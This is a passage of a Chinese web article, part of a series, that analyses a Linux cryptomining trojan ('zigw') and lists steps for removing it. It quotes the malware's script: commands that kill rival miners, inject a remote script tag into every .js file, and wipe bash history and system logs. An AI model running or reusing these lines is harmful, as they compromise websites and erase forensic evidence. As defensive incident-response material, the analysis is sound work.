如何排查常见挖矿木马( 六 )
netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$adocument.write(''<script src=https://www.isolves.com/it/aq/mm/2019-06-06/"http://t.cn/EvlonFh">');history -cecho > /var/spool/mail/rootecho > /var/log/wtmpecho > /var/log/secureecho > /root/.bash_historyecho > /var/spool/mail/root可以看到,脚本首先生成特征文件/etc/gmbpr2,接着将系统自带的wget和curl重命名为get和url,防止以后其它进入本机挖矿的脚本下载矿机抢夺资源,然后如果存在特征文件/etc/gmbpr,则认为该机器已经被其他同类攻击者感染,会停止zjgw进程并删除/etc下的gpbpr和shz.sh 。
文章插图
接下来判断如果存在自己的特征文件/etc/gmbpr2,就会为主机添加定时任务,并向authorized_keys中添加自己的公钥文件 。
文章插图
最后就会下载挖矿程序并执行,并为/tmp/zigw /tmp/shz/sh 增加i属性,避免被删除,最后添加防火墙规则屏蔽部分常用矿池的端口,并清除掉其他常见挖矿程序 。
从脚本看出,zigw只是以定时任务的方式实现驻留,所以该木马的清除步骤为
1).清除定时任务,/var/spool/cron/$USER中的内容
2).结束zigw进程,pkill -9 zigw
3).删除公钥文件,/root/.ssh/zuthorized_keys
4).删除残留文件,需要先去除i属性,然后删除(chattr -i /etc/zigw /etc/shz.sh /tmp/zigw /tmp/shz.sh; rm /etc/zigw /etc/shz.sh /tmp/zigw /tmp/shz.sh /etc/gmbpr2)
5).恢复防火墙规则
参考链接
https://github.com/chenkaie/junkcode/blob/7134fb63eecf32fefc47d613a7f2f37d4eee05fb/xhide.c
https://github.com/gianlucaborello/libprocesshider
https://www.freebuf.com/column/188100.html
https://blog.csdn.net/btc18129874591/article/details/80566799
https://xmr.omine.org
https://www.f2pool.com/
推荐阅读
- JavaScript 究竟是如何工作的?
- 春季如何正确保养皮肤 春季如何保养皮肤
- 白琳工夫的生长环境如何
- 饼干面团松散怎么补救 月饼皮一捏就散如何补救
- 常见易被忽略的用药小知识
- 工夫红茶与红碎茶的常见弊病 你知道吗
- 面试题:如何设计一个消息队列?
- 该如何解决就业、求职问题 如何解决就业问题
- 如何关闭抖音个人资质认证 抖音如何取消达人资质
- 教你如何辨别红碎茶的好坏